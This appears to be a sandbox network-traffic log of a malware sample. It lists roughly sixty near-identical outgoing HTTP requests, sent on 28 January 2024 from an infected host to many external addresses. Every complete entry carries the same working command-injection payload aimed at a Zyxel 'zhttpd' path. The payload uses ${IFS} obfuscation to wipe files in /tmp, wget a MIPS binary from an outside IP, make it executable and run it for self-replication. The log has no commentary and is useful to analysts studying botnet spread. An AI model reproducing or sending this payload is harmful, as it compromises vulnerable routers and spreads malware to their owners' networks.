                                                Jan 28, 2024 10:16:31.908489943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6039192.168.2.235252418.14.102.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908516884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6040192.168.2.235925259.143.183.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908526897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6041192.168.2.2338036147.31.116.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908577919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6042192.168.2.2336298182.133.97.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908587933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6043192.168.2.234909643.13.24.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908641100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6044192.168.2.2354930177.172.208.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908648968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6045192.168.2.233792219.166.220.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908688068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6046192.168.2.2343492123.71.43.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908694029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6047192.168.2.2342158178.31.69.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908710003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6048192.168.2.2344806203.190.65.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908718109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6049192.168.2.2343864153.243.110.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908766985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6050192.168.2.233576677.6.82.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908791065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6051192.168.2.2342062210.205.74.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908818960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6052192.168.2.23521564.209.15.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908823967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6053192.168.2.234166637.118.186.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908874989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6054192.168.2.2337930109.6.106.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908914089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6055192.168.2.235328045.21.163.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908940077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6056192.168.2.235772637.36.32.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909056902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6057192.168.2.235747686.64.105.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909086943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6058192.168.2.2349692152.46.226.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909106016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6059192.168.2.235641231.45.171.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909128904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6060192.168.2.235078677.13.221.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909157991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6061192.168.2.23344465.235.72.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909187078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6062192.168.2.2333018172.93.58.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909193993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6063192.168.2.2342778160.73.75.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909238100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6064192.168.2.2342878190.249.32.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909259081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6065192.168.2.2338402132.188.200.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909297943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6066192.168.2.2347098197.187.104.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909331083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6067192.168.2.2353758173.142.254.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909352064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6068192.168.2.234559247.83.138.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909377098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6069192.168.2.2345492178.5.212.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909403086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6070192.168.2.235816670.229.191.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909427881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6071192.168.2.233790414.25.113.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909476042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6072192.168.2.235357254.226.211.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909487009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6073192.168.2.2344752203.128.112.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909495115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6074192.168.2.2337142103.171.157.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909533978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6075192.168.2.2351524107.46.49.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909545898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6076192.168.2.2337192186.88.155.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909588099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6077192.168.2.235308052.46.17.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909611940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6078192.168.2.234935018.161.106.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909638882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6079192.168.2.233437895.6.109.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909665108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6080192.168.2.2347836162.224.102.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909698963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6081192.168.2.234972227.1.239.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909725904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6082192.168.2.2352956171.42.210.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909744024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6083192.168.2.235326670.110.195.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909787893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6084192.168.2.2345272101.70.54.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909812927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6085192.168.2.2334446218.131.172.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909836054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6086192.168.2.235984214.39.248.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909874916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6087192.168.2.2339794134.35.81.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909883022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6088192.168.2.233389249.189.211.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909884930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6089192.168.2.2333518155.33.47.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909907103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6090192.168.2.2336608189.226.128.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909938097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6091192.168.2.235908479.43.2.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909940004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6092192.168.2.2347540174.73.134.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.909976006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6093192.168.2.233650685.37.26.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910005093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6094192.168.2.2343542180.0.174.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910033941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6095192.168.2.23368644.198.228.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910060883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6096192.168.2.235214878.124.158.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910070896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6097192.168.2.234522214.2.83.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910079002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6098192.168.2.235156858.205.98.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910123110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6099192.168.2.2337862205.247.237.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910151958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6100192.168.2.234454832.2.8.168443
                                                TimestampBytes transferredDirectionData
